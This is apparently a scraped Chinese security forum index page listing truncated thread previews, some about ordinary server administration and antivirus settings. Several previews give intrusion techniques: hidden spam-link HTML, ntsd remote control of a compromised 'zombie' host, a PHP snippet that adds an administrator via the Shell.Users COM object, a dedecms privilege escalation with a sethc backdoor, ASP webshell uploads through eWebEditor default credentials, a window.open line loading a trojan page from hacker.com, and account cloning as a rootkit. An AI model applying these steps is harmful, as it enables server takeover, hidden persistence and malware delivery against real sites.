电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

服务器安装eset杀毒软件(nod32)带防火墙，系统启动防火墙只允许相对应端口。 　　然后直接运行这个“Win 服务器过滤策略.exe” (适合服务器的)，但运行完,3389无法连接了，起初以为防火墙或杀毒带的防火墙影响，把他两个都关了还不好使。 　　后来有装了个radmin,并把端口改为8888，但外部还是无法连接，telnet I ...

一般分两种情况第一种：mcafee没有开启防注册表修改的功能,即访问保护 已禁用状态在注册表中找到HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection ，再找到UIP子键，删除该子键第二种：访问保护 已启用状态。重启电脑，进入安全模式，然后打开注册表，在注册表中找到HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProte ...

打开.Net Framework附带的SDK命令提示符。 　　加密命令： 　　aspnet_regiis -pe “connectionStrings” -app “/encrypttest” 　　-pe开关用来指定web.config中需要加密的节（Web.Config文件中的connectionStrings配置节）。 　　-app开关用来指定IIS里面的虚拟目录，如果为根目录网站，为”/& ...

<NOSCRIPT> <a herf=http://***.com style=”color:#FFFFFF;font-size:1px;line-height:1px;”>哪种减肥药效果好</a> </NOSCRIPT> 黑链代码一、链接颜色与背景颜色相同，链接文字小于或等于1像素。 <a herf=http://***.com style=”color:#FFFFFF;font-size:1px;line-height:1px;”>哪种减肥药效果好</ ...

1.肉鸡上运行：ntsd -server tcp:port=端口 要调试的程序（可以任意，只要存在即可），例如：ntsd -server tcp:port=99 calc.exe，会新弹出个窗口，并监听刚才设置端口。  2.本机运行：ntsd -remote tcp:server=IP,port=端口，例如：ntsd -remote tcp:server=192.168.1.1,port=99。会弹出一个窗口。如果参数填写正确的 ...

当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen 以及wscript.shell 组建被禁用的情况下,这也许是一个机会。 代码如下: 复制代码代码如下: <?php echo "<div align=center><b>HP 版Shell.Users加管理员帐号</b></div>"; $username="IceSkin"; $password="skin.com"; $su = new COM("Shell.Users" ...

安全中国用的是dedecms,如果是5.5版本在这data/common.inc就可以找到root名字和密码root找到后用好用孤水绕城写的UDF.PHP来提权，免杀的很好用。上传了个port.exe先读端口图1 然后把sethc替换成explorer,图2   连接服务器按5次shift出现C盘，找到这个文件C:\WINDOWS\system32\lusrmgr.msc加个用户，加完记得给他加上a ...

这种情况表明邮件信息没有成功发送给smtp服务器,开始我估计是端口的原因,可检查发现防火强25端口畅通,TCP/IP筛选设置也是对的.正纳闷的时候想到了还有个在默默工作中的Mcafee,平日里没这方面的设置.于是查看Mcafee日志,是然有发现: 2010-11-22 13:41:19 被端口阻挡规则阻挡 w3wp.exe 禁止大量发送邮件的蠕虫病毒发送邮件 ** ...

自定义规则导出方法 同样打开注册表编辑器 找到[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VSCore\On Access Scanner\BehaviourBlocking]项 在右边找到AccessProtectionUserRules，里面就存储着您的自定义规则信息了 注意：与8.0i不同的是，8.5i的所有设置都储存在一个值中 在这里是自定义规则导出方法和具体的详细步骤，给需要 ...

IT运维常用的软件工具主要包括：监控工具、自动化运维工具、日志管理工具、网络管理工具、资产管理工具、服务台工具。这些工具分别用于保障IT系统稳定运行、提升运维效率、快速响应故障。其中，监控工具至关重要，它能实时监测系统运行状态、资源使用情况以及故障报警。知名的监控工具如Zabbix、Nagios和Prometheus在IT运维 ...

以前写的文章，今天整理到的，这是以前搞脚本安全的一些经验，扔出来，当时靠 DW的确检测了很多脚本安全问题。BY：乱雪来源：0xx.org.cn挖掘脚本漏洞和软件漏洞相比来说更容易一些，门槛也很低，不需要掌握汇编、系统原理等等高深知识，只需要掌握脚本，甚至没有编写过WEB程序，只要能看得懂代码，也就能挖得到洞。如果一个 ...

发布日期：2011-05.04发布作者：c4rp3nt3r 影响版本：phpcms2008 sp2 or sp4官方地址：http://www.phpcms.cn 漏洞类型：文件包含漏洞描述：phpcms本地包含类漏洞，如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。 由于phpcms的全局变量机制，导致能拿shell的方法很多，类似的问题不止一 ...

这是一个eweb入口（废话）   用默认帐户密码admin admin进入   样式添加asa扩展名   直接上传asp马   到这里都是顺利的，但是。。当你访问马的时候。。   试过了小马，一句话，会出现同样的问题   解决方法：   在样式添加里加上扩展名ashx   创建一个1.ashx的文件, 上传，代 ...

其实如果要防止被挂IFRAME木马，方法很简单，只需要利用JavaScript对IFRAME进行控制即可。方法如下： 复制代码代码如下: <style type="text/css" media="all"> iframe{ v:expression(this.src='about:blank',this.outerHTML='');/*使用CSS属性去除所有IFRAME*/ } #htmer{v:expression() !important} /*如果要使自己的IFRAME ...

这种方法使用的关键代码如下： window.open("http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 这种代码往往很长，很容易被安全工程师发现，而且没有经验的黑客也喜欢将“width”和“height=”参数设为“0& ...

一、利用帐户克隆工具来创建　　Clone Administrator（CA.exe），利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号（此普通帐号必须已经存在）。克隆得到的帐号具有和系统内置的Administrator同样的设置，并且用NET命令或者用户管理器也发现不了其权限已经被提升，是一个不错的ROOT KIT。　　现在，我们就来 ...

【原理基础】　　克隆帐号的原理简单的说是这样：在注册表中有两处保存了帐号的SID相对标志符,一处是SAM\Domains\Account%users下的子键名，另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误，登陆时用的是后者，查询时用的是前者。当用admin的F项覆盖其他帐号的F项后，就造成了帐号是管理员权限但查询还是原 ...

mt.exe下载D:\>mt.exe Usage:　mt.exe　<Opintion> Opintion : 　-filter　　　　　　　　　 ---Change TCP/IP filter to on/off status. 　-addport　　　　　　　　　---Add ports to the filter' allowed portlist. 　-setport　　　　　　　　　---Set ports as the filter' allowed portlist. 　-nicinfo　　　　　　 ...

在系统账户中查找/删除克隆账户 1.备份注册表操作前首先将注册表SAM项中的内容导出，做好备份，以便在修改出现问题时恢复。 2.查找克隆账户mt.exe为一个查看克隆账户的工具，这个exe文件会被杀毒软件当成病毒杀掉，所以使用前要关闭杀毒软件或排除对这个文件所在目录的检查。在命令行下运行 mt.exe -chkuser >> d:\chkuser. ...

1：抓包上传 我们可以用WSockExpert(抓包工具) hkcpost抓包提交软件或等等抓包工具 说下hkcpost有时候电脑打不开WSockExpert(抓包工具) 我们就用这工具 很好用 说到抓包上传 比如一个上传地址http://site/upload.asp 或后台管理后台上传地址 我们就抓包cookies 参数 和文件上传成功地址 然后用明小子或等等抓包工具 上传。 ...